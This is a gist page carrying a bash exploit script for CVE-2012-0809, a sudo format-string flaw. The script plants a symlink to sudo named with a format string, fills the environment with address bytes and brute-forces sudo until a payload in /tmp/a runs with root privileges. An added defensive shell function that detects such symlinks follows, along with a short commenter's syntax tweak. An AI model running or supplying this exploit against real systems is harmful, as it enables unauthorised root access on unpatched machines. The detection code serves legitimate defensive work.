@joernchen
Created April 28, 2014 16:28
sudo.sh (CVE-2012-0809)
#!/bin/bash
# CVE-2012-0809 exploit
# joernchen of Phenoelit's version
# Payload to be executed goes to /tmp/a (might be a shell script)
cd /tmp
/bin/echo '-> Clearing ENV'
for i in `env |cut -f1 -d "="` ;do unset $i;done
/bin/echo '-> Creating symlink'
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
export AAA=AAAA;
export A;
for i in `/usr/bin/seq 1 5000`; do
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;
/bin/echo '-> Now a little Brute-Force'
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi ; done
/bin/echo '-> Cleaning up'
/bin/rm /tmp/%134520134x%900\$n
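
For defenders, the visible trace of the script above is a symlink to /usr/bin/sudo whose file name carries printf conversion directives. The sweep below is an added example, not part of the original gist; the function names `has_format_directive` and `find_suspicious_links` are hypothetical, and it assumes a `readlink` that supports `-f`.

```shell
#!/bin/sh
# Added defensive example (not from the original gist).
# Flags symlinks that resolve to a given binary and whose own file name
# contains printf-style conversion directives such as %x or %2$n.

# Return 0 if the string looks like it contains a printf conversion:
#   % [position$] [flags] [width] [.precision] [length] conversion
# Heuristic only: a harmless name such as "100%done" also matches (%d).
has_format_directive() {
    printf '%s\n' "$1" | grep -Eq \
        '%([0-9]+\$)?[-+ #0]*[0-9]*(\.[0-9]+)?(hh|h|ll|l|L|j|z|t)?[diouxXeEfgGaAcspn]'
}

# Print every symlink directly under DIR that resolves to TARGET and whose
# basename contains a format directive. TARGET defaults to /usr/bin/sudo.
# Usage: find_suspicious_links /tmp
find_suspicious_links() {
    dir=$1
    target=${2:-/usr/bin/sudo}
    # Resolve the target once so links are compared by their final path.
    real=$(readlink -f -- "$target") || return 1
    # Globbing (rather than parsing find output) copes with odd file names.
    for link in "$dir"/* "$dir"/.[!.]*; do
        [ -L "$link" ] || continue
        [ "$(readlink -f -- "$link")" = "$real" ] || continue
        if has_format_directive "${link##*/}"; then
            printf '%s\n' "$link"
        fi
    done
    return 0
}
```

Run it against world-writable directories such as /tmp and /var/tmp; any hit is worth correlating with sudo invocations logged from the same directory.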
@mathiasbynens

for i in `/usr/bin/seq 1 5000`

for i in {1..5000}